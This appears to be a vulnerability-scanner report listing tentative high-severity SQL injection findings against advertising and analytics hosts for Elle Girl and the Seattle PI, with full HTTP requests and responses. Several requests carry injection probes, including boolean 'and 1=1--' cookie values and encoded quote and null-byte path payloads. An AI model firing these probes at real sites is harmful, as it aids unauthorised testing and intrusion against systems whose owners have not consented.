GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: dt=97,20110917162454,OS |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:06 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: C=oML6Y9wx3NQ0caatcS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 153976775/1228215787 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:15 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba Set-cookie: C=oxY5Y9wQKLW1caaBdS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:15 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: C=oxY5Y9wQKLW1caaCdS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detect |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:11 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba Set-cookie: C=osY5Y9wQKLW1caa8cS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detect?cat=hfmus.eg Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:11 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: C=osY5Y9wQKLW1caa9cS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:19 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba Set-cookie: C=oYL6Y9wdWQQ0caaGdS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:19 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: C=oYL6Y9wdWQQ0caaHdS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:49 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba Set-cookie: C=o4Y5Y9wQKLW1caa0gS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:32:49 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.13 NY-AD3 Set-cookie: C=o4Y5Y9wQKLW1caa1gS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 156176306/1230315612 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:23 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.11 NY-AD1 Set-cookie: A=dqR5Y9wK67ULv9UJ7MTba Set-cookie: C=o3L6Y9wUS38Scaa7dS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140303008/1214455850 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:24 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.11 NY-AD1 Set-cookie: C=o3L6Y9wUS38Scaa8dS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140303008/1214455850 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:33:04 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.11 NY-AD1 Set-cookie: A=dqR5Y9wKWJSLv9UJ7MTba Set-cookie: C=okZ5Y9wz8F6ScaaziS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140138687/1214289938 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cm8dccp=1316276692 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:33:04 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.11 NY-AD1 Set-cookie: C=okZ5Y9wz8F6ScaaAiS x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 140138687/1214289938 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:12 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba Set-cookie: C=oSL6Y9wdWQQ0caa6cS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:12 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: C=oSL6Y9wdWQQ0caa7cS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://hfm.checkm8.com |
Path: | /adam/detected |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291%20and%201%3d1--%20 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:42 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba Set-cookie: C=omM6Y9wdWQQ0caaCfS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
GET /adam/detected?cat=hfmus Host: hfm.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ Cookie: cm8dccp=1316277291%20and%201%3d2--%20 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:51:43 GMT Server: Apache P3P: policyref="http://hfm x-internal-server: 192.168.212.12 NY-AD2 Set-cookie: C=omM6Y9wdWQQ0caaDfS x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires Set-Cookie: cm8dccp=;Path=/;Expires x-internal-note: NO-COOKIES-BY-DISPATCHER x-internal-id: 153982087/1228215537 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ... |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.elle.com |
Path: | /b/ss/hcfellegirlprod/1/H |
GET /b%2527/ss/hcfellegirlprod/1/H Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:15 GMT Server: Omniture DC/2.0.0 Content-Length: 442 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/hcfellegirlprod ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%2527%2527/ss/hcfellegirlprod/1/H Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:15 GMT Server: Omniture DC/2.0.0 xserver: www493 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.elle.com |
Path: | /b/ss/hcfellegirlprod/1/H |
GET /b/ss/hcfellegirlprod/1%00'/H.15.1/s92564277239143 Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:42 GMT Server: Omniture DC/2.0.0 Content-Length: 416 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/hcfellegirlprod/1 was not found on this server. ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b/ss/hcfellegirlprod/1%00''/H.15.1/s92564277239143 Host: metrics.elle.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:42 GMT Server: Omniture DC/2.0.0 xserver: www409 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.seattlepi |
Path: | /b/ss/hearstseattlepi/1/H |
GET /b%00'/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:02:42 GMT Server: Omniture DC/2.0.0 Content-Length: 400 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%00''/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:02:42 GMT Server: Omniture DC/2.0.0 xserver: www600 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.seattlepi |
Path: | /b/ss/hearstseattlepi/1/H |
GET /b%2527/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:26:41 GMT Server: Omniture DC/2.0.0 Content-Length: 445 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/hearstseattlepi ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%2527%2527/ss/hearstseattlepi/1/H Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:26:40 GMT Server: Omniture DC/2.0.0 xserver: www617 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://metrics.seattlepi |
Path: | /b/ss/hearstseattlepi/1/H |
GET /b/ss/hearstseattlepi%00'/1/H.21/s98951816044282 Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:06:31 GMT Server: Omniture DC/2.0.0 Content-Length: 419 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/hearstseattlepi was not found on this server.</ ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b/ss/hearstseattlepi%00''/1/H.21/s98951816044282 Host: metrics.seattlepi.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|273A64C3 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:06:31 GMT Server: Omniture DC/2.0.0 xserver: www596 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://syn.verticalacuity |
Path: | /varw/getPromo |
